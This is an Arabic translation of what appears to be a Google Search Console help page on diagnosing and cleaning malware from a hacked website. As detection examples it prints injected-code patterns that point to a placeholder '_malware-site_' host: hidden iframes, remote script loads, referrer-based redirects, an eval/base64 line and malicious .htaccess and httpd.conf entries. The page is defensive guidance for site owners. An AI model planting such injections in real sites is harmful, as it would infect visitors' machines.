تم الاختراق باستخدام البرامج الضارة

البرامج الضارة هي أي تطبيق للأجهزة الجوّالة أو برنامج تم تصميمه خصيصًا لإلحاق الضرر بجهاز كمبيوتر أو بجهاز جوّال أو ببرامج الجهاز أو بمستخدميه. لمزيد من المعلومات عن البرامج الضارة، يُرجى الاطّلاع على البرامج الضارة والبرامج غير المرغوب فيها.

إذا كان موقعك يحتوي على برامج ضارة، فعادة ما يرى المستخدمون التحذير "قد يؤدي هذا الموقع إلى الإضرار بجهاز الكمبيوتر الخاص بك" في نتائج البحث أو على صفحة بينية يعرضها المتصفح عندما يحاول المستخدم زيارة موقعك، على النحو التالي:

صفحة بينية تمثيلية للبرامج الضارة
نتائج بحث تتضمّن تحذيرًا يشير إلى برامج ضارة

ستحتاج إلى ما يلي:

  • وصول مشرف واجهة المستخدم أو واجهة المستخدم إلى خوادم الموقع: الويب وقاعدة البيانات والملفات.
  • معرفة بأوامر واجهة الأوامر أو أوامر الوحدة الطرفية
  • القدرة على تشغيل استعلامات SQL (لغة الاستعلام البنيوية) على قاعدة البيانات.

الإعداد

  • اشترِك في Search Console وأثبِت ملكيتك للموقع الذي تم اختراقه كما هو موضّح في هذه الصفحة. توفّر خدمة Search Console عيّنة من الصفحات المتأثرة، ما يسهّل عملية العثور على مشاكل البرامج الضارة وحلّها. إضافةً إلى ذلك، سيتم تحذيرك عندما يتم اكتشاف أنّ موقعك الإلكتروني يتأثر بالعديد من أنواع البرامج الضارة أو عمليات الاختراق الأخرى.

  • راجِع صفحة تشخيص التصفح الآمن من Google للاطّلاع على معلومات عامة حول ما إذا كان الموقع الإلكتروني قد يكون ضارًا للمستخدمين أم لا. يمكنك الاطّلاع على حالة البيانات لصفحتك أو موقعك الإلكتروني على عنوان URL مشابه لما يلي: https://transparencyreport.google.com/safe-browsing/search?url=***<<page_or_site>>*** على سبيل المثال: https://transparencyreport.google.com/safe-browsing/search?url=webmastercentralblog.blogspot.com

    يمكن أن يكون <<page_or_site>> عنوان URL لصفحة معيّنة (http://example.com/badpage) أو عنوان URL لموقعك الإلكتروني بالكامل (example.com).

  • تجنُّب استخدام متصفّح لعرض الصفحات على موقعك الإلكتروني: ولأنّ البرامج الضارة غالبًا ما تتناغم من خلال استغلال الثغرات الأمنية في المتصفّح، قد يؤدي فتح صفحة مصابة ببرامج ضارة في أحد المتصفِّحات إلى إلحاق الضرر بجهاز الكمبيوتر. استخدِم cURL أو Wget لتنفيذ طلبات HTTP (لجلب صفحة مثلاً) ما لم تنص تعليمات التشخيص على إمكانية الوصول إلى الصفحة مباشرةً من متصفحك.

    وهذه الأدوات المتوفرة مجانًا مفيدة في تشخيص عمليات إعادة التوجيه، كما أنها تتمتع بالمرونة لتضمين معلومات عن المُحيل أو وكيل المستخدم. ويساعد تضمين مُحيل أو وكيل مستخدم معين في محاكاة المخترقين، لأن المخترقين قد لا يعرضون سوى المحتوى الضار للمستخدمين الذين لديهم وكلاء مستخدم أو محيلين محددين لاستهداف المزيد من "أشخاص حقيقيين" وتجنب الاكتشاف من مالكي المواقع وأدوات البحث عن البرامج الضارة.

`curl -v --referer "http://www.google.com" <your-url>`

في ما يلي مثال يحدِّد كلاً من وكيل المستخدم والمحيل:

`curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html`

ننصح بجلب صفحة تحتوي على --referer "https://www.google.com" أو بدونه، لأنّ بعض البرامج الضارة لا يتم تفعيلها إلا عندما يأتي المستخدمون من نتائج "بحث Google".

  • أنشئ مستندًا لتسجيل ما يتم التوصل إليه في هذه الخطوة. سيتضمن المستند في النهاية (على الأقل) اسم كل ملف تالف وموقعه وملاحظات حول كيفية إصابته بالفيروسات، وسيتم استخدامه كأساس لتنظيف الموقع وصيانته.

  • شاهد الفيديو في وقت سابق من هذه الصفحة للاطّلاع على كيفية عمل البرامج الضارة وكيفية الحفاظ على أمانك أثناء إجراء عمليات التحقّق من عدم وجود برامج ضارة.

التشخيص

تحديد البرامج الضارة التي تؤثر في موقعك الإلكتروني:

  1. افتح تقرير "مشاكل الأمان" الخاص بموقعك الإلكتروني في Search Console. وسِّع وصف التحذير من البرامج الضارة للاطّلاع على قائمة بأمثلة الصفحات المتأثرة. يُرجى العِلم أنّ هذه القائمة ليست شاملة، لذا قد لا تتوفّر نماذج صفحات لجميع أنواع البرامج الضارة على موقعك الإلكتروني.
  2. اختبِر الصفحات النموذجية بحثًا عن الأنواع التالية من البرامج الضارة.

برامج ضارة لإعداد الخادم (عمليات إعادة توجيه غير مرغوب فيها)

اخترق أحد المتطفلين موقعك الإلكتروني ويعيد توجيه الزائرين من موقعك الإلكتروني الجيد إلى موقعه المصمَّم للهجمات الضارة، من خلال تعديل ملفات إعداد الخادم على الأرجح. وتسمح ملفات إعداد الخادم عادةً لمشرف الموقع الإلكتروني بتحديد عمليات إعادة توجيه عناوين URL لصفحات أو أدلة معيّنة على الموقع الإلكتروني. على سبيل المثال، هذا هو ملف .htaccess بالإضافة إلى httpd.conf على خوادم Apache.

التشخيص

انتقِل إلى بعض عناوين URL المُعطاة كأمثلة في تقرير "مشاكل الأمان". وقد تشتمل الاستجابة من صفحة مصابة بفيروسات "إعداد الخادم" على العناوين التالية:

&lt; HTTP/1.1 301 Moved Permanently
&lt; Date: Sun, 24 Feb 2013 21:06:45 GMT
&lt; Server: Apache
&lt; Location: http://&lt;<strong>_malware-attack-site_</strong>&gt;/index.html
&lt; Content-Length: 253

تحديد الملفات المتأثّرة

سجِّل الدخول إلى الخادم باستخدام واجهة الأوامر أو الوحدة الطرفية (يمكن أن يكون الموقع بلا اتصال بالإنترنت إذا أردت ذلك) وراجِع ملفات إعداد الخادم ذات الصلة. قد يكون هناك أكثر من ملف لإعداد خادم تم اختراقه على موقعك الإلكتروني. تحقَّق من هذه الملفات بحثًا عن توجيهات غير مرغوب فيها، مثل عمليات إعادة التوجيه إلى مواقع إلكترونية غير معروفة. على سبيل المثال، في ملف .htaccess، قد تظهر لك عملية إعادة توجيه تبدو كما يلي:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*
**RewriteRule ^third-page.html($|/) http://&lt;<em><strong>_malware-site_</strong></em>&gt;/index.html** [R=301]

إدخال SQL

اخترق أحد المتطفلين قاعدة بيانات موقعك الإلكتروني. على سبيل المثال، ربما يكون الهاكر قد أدخل رمزًا برمجيًا ضارًا في كل سجل بجدول قاعدة البيانات بحيث عندما يحمّل الخادم صفحة تتطلب معلومات من قاعدة البيانات، يتم تضمين الرمز الضار في محتوى الصفحة الآن ويمكن أن يضر بزائري الموقع.

التشخيص

  1. نفِّذ بعض طلبات البحث على عناوين URL المتأثرة في سطر الأوامر، وافحص الاستجابة لكلمات هجوم SQL مثل "iframe" أو "eval".

  2. سجِّل الدخول إلى خادم قاعدة البيانات أو اعرض قاعدة البيانات من خلال أداة مثل phpMyAdmin. إذا كنت تستخدم Wget أو cURL، فحاول ربط التلف الموجود في رمز المصدر للصفحة من خلال Wget أو cURL بإدخالات قاعدة البيانات الفعلية. على سبيل المثال، إذا لاحظت أن صفحاتك تتضمن إطار iframe خطيرًا، يمكنك إجراء طلب بحث SQL للبحث عن رمز iframe. مثال:

    SELECT * FROM blog_posts WHERE post_text LIKE '%&gt;iframe%';

  3. ننصحك أيضًا بالتحقق من سجلّ قاعدة البيانات وملفات الأخطاء على خادمك بحثًا عن أيّ نشاط غير معتاد، مثل أوامر SQL غير المتوقّعة التي تبدو غير معتادة للمستخدمين العاديين أو الأخطاء.

حلّ المشكلة

ويمكنك إما تحديث كل سجل قاعدة بيانات مصاب، أو استعادة آخر نسخة احتياطية معروفة من قاعدة البيانات.

إدخال الرمز

تم تعديل صفحات موقعك الإلكتروني لتضمين رمز ضار، مثل إطار iframe، إلى موقع مُعدّ للهجوم ببرامج ضارة.

التشخيص

انتقِل إلى بعض نماذج عناوين URL المعروضة في تقرير "مشاكل الأمان" باستخدام cURL أو wGet، وافحص بحثًا بحثًا عن أي رموز مريبة. يمكن أن تأخذ التعليمات البرمجية التي تم إدخالها عدة أنواع، وقد يصعب العثور عليها. قد يكون من المفيد البحث عن كلمات مثل "iframe" للعثور على رمز iframe. وهناك كلمات رئيسية أخرى مفيدة هي "script" و"eval" و"unescape". على سبيل المثال، للبحث في جميع الملفات عن "iframe" على الأنظمة التي تعمل بـ Unix:

$grep -irn "iframe" ./ | less</pre>

في ما يلي بعض الأنماط الشائعة للبرامج الضارة التي يمكن البحث عنها.

إطار iframe يحمّل موقعًا ضارًا:

&lt;iframe frameborder="0" height="0" src="http://&lt;<strong><em>_malware-site_</em></strong>&gt;/path/file"
  style="display:none" width="0"&gt;&lt;/iframe&gt;

JavaScript أو لغة برمجة نصية أخرى تستدعي نصوصًا برمجية وتشغلها من موقع هجوم:

&lt;script type='text/javascript' src='http://&lt;<em><strong>_malware-site_</strong></em>&gt;/js/x55.js'&gt;&lt;/script&gt;

نص برمجي يعيد توجيه المتصفح إلى موقع هجوم:

&lt;script&gt;
  if (document.referrer.match(/google\.com/)) {
    window.location("http://&lt;<em><strong>_malware-site_</strong></em>&gt;/");
  }
&lt;/script&gt;

رمز ضار تم إخفاء مفاتيح فك تشفيره لتجنُّب رصده:

eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));

ملفات عناصر مشتركة مصمَّمة لكتابة رموز برمجية ضارة بشكل عشوائي على نصوص برمجية غير خطيرة:

#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c

نماذج الأخطاء الضارة

يتم ضبط النموذج المستخدَم لرسائل الخطأ، مثل "404 لم يتم العثور على الملف"، لتوزيع برامج ضارة. وبهذه الطريقة، يمكن للمهاجمين شن هجمات على عناوين URL غير الموجودة على موقعك الإلكتروني.

التشخيص

اطلب صفحة غير موجودة على موقعك أو صفحة تعرض نوعًا آخر من الأخطاء، وافحص الاستجابة لمعرفة ما إذا كانت تأتي من موقع آخر أو تحتوي على برامج ضارة بأي طريقة أخرى.

حلّ المشكلة

سجِّل الدخول إلى خادم الويب وابحث في ملفات تهيئة الخادم عن توجيهات لصفحات الخطأ. على سبيل المثال، يمكن الإعلان عن نموذج الخطأ لخوادم الويب Apache في ملف .htaccess. في ما يلي مثال على إدخال ملف .htaccess يسترد صفحات الخطأ 404 من موقع ضار:

ErrorDocument 404 http://&lt;<span class="red-text"><em><strong>_malware-site_</strong></em></span>&gt;/index.html

عندما تكون جاهزًا لتنظيف موقعك، استبدل ملفات .htaccess بنسخة احتياطية جيدة معروفة، أو احذف توجيهات errorDocument غير المرغوب فيها على ملفات .htaccess الحالية. تأكد أيضًا من تنظيف ملفات الخطأ الفعلية إذا كانت موجودة على موقعك. وأخيرًا، أعِد تشغيل خادم الويب للتأكد من سريان جميع التغييرات.

الموارد التي يتم تحميلها من موقع إلكتروني مخترَق أو ضار {compromized-resources}

يستخدم موقعك الإلكتروني محتوى أو موارد من موقع إلكتروني يشتهر باحتوائها على محتوى ضار. وقد تكون هذه الملفات عبارة عن ملفات JavaScript أو صور أو ملفات أخرى. ولهذا السبب، سيتم وضع علامة على موقعك الإلكتروني بأنه يتضمّن برامج ضارة يتم تحميلها من ذلك الموقع الإلكتروني الآخر.

التشخيص

انتقِل إلى بعض عناوين URL المُعطاة كأمثلة في تقرير "مشاكل الأمان".

حلّ المشكلة

  1. تأكَّد من المشكلة من خلال الانتقال إلى بعض نماذج عناوين URL المدرَجة في تقرير "مشاكل الأمان" في Search Console. من المفترض أن يظهر لك تحذير في المتصفِّح.
  2. سيخبرك تحذير المتصفح بنطاق المحتوى المشكوك فيه. عليك إزالة جميع الإشارات إلى الموقع الإلكتروني الذي تمّ الإبلاغ عنه في تحذير المتصفِّح. فإذا كان محتوى الموقع الذي تم الإبلاغ عنه قد تم تضمينه بدون علمك، تكون المشكلة أكثر خطورة. موقعك الإلكتروني على الأرجح قد تعرّض للاختراق، ويجب أن تواصل فحص موقعك بحثًا عن أي عمليات اختراق وثغرات أخرى.
  3. إذا تعمّدت تضمين محتوى من موقع إلكتروني شرعي تمّ الإبلاغ عنه وأردت إعادة تضمين المحتوى بعد إزالة الموقع الذي تم الإبلاغ عنه، يمكنك مراقبة حالة الموقع الإلكتروني الذي تم الإبلاغ عنه من خلال صفحة بيانات تشخيص التصفّح الآمن من Google لهذا الموقع (http://www.google.com/safebrowsing/diagnostic?site=www.example.com){:.external}. عادةً ما يقوم مالكو المواقع الشرعية بتنظيفها بسرعة.

التحقيق الإضافي

بعد ذلك، تحقق من عدم وجود أي ملفات أو تغييرات ضارة إضافية على النظام. ربما يكون المخترق قد عدّل صفحات حالية أو سجلات قاعدة بيانات، أو أنشأ صفحات جديدة تمامًا غير مرغوب فيها، أو كتبًا وظائف تعرض المحتوى غير المرغوب فيه على صفحات نظيفة، أو ترك "الأبواب الخلفية" التي تسمح للمتطفل بإعادة الدخول إلى موقعك، أو من خلال إعادة إدخال رمز ضار أزلته.

إذا كان موقعك على الإنترنت، نقترح عليك إزالته من أجل إجراء هذا التحقيق.

إذا كانت لديك نسخة احتياطية جيدة معروفة من موقعك، حدد الملفات التي تم إنشاؤها أو تعديلها منذ وقت الاحتفاظ بنسخة احتياطية وافحصها. وعلى الأنظمة المستندة إلى Unix، يمكنك استخدام أمر مثل ما يلي للعثور على ملفات جديدة:

diff -qr <current-directory> <backup-directory>

مثال:

diff -qr www/ backups/full-backup-20120124/

أيضًا:

md5sum <current-page> <backup-page>

مثال:

md5sum www/page.html backups/full-backup-20120124/page.html

افحص الخادم وإمكانية الوصول وسجلّات الأخطاء بحثًا عن أي نشاط مريب، مثل محاولات تسجيل الدخول غير الناجحة وسجلّ الأوامر (خاصةً كجذر) وإنشاء حسابات مستخدمين غير معروفة. انتبه إلى أن الهاكر ربما غيّر هذه السجلات لأغراض خاصة به. يتم عرض بعض الأمثلة في الفيديو بخصوص تحديد الثغرة الأمنية.

تحقَّق من ملفات الإعداد لعمليات إعادة التوجيه. عادةً ما تتم تسمية ملفات الضبط باسم .htaccess وhttpd.conf. غالبًا ما ينشئ المخترقون عمليات إعادة توجيه مشروطة بناءً على وكيل المستخدم أو الوقت خلال اليوم أو المُحيل. إذا كنت بحاجة إلى تحديث ملفات الإعداد، قد تحتاج إلى إعادة تشغيل الخادم كي تدخل التغييرات حيز التنفيذ.

التحقّق من أذونات المجلدات والملفات مفرطة في التساهل: يتلاعب المخترقون بالأذونات لأنّه إذا لم يرصد مالك الموقع الإلكتروني تلك الأذونات، سيتمكّن المُخترِق من الدخول إليه مجددًا. قد تؤدي الملفات التي يزيد حجمها عن 644 (rw-r--r--) والمجلدات الأكبر من 755 (rwxr-xr-x) إلى حدوث مشاكل أمان. ولذلك تأكد من أن أية أذونات غير محكمة تمثل أهمية كبيرة. على الأنظمة التي تعمل بـ Unix، جرِّب ما يلي:

find <your-dir> -type d -not -perm 755 -exec ls -ld {} \;

و:

find <your-dir> -type f -not -perm 644 -exec ls -la {} \;

إذا كانت لديك قاعدة بيانات، تحقق من السجلات واحدًا تلو الآخر باستخدام أداة مثل phpMyAdmin.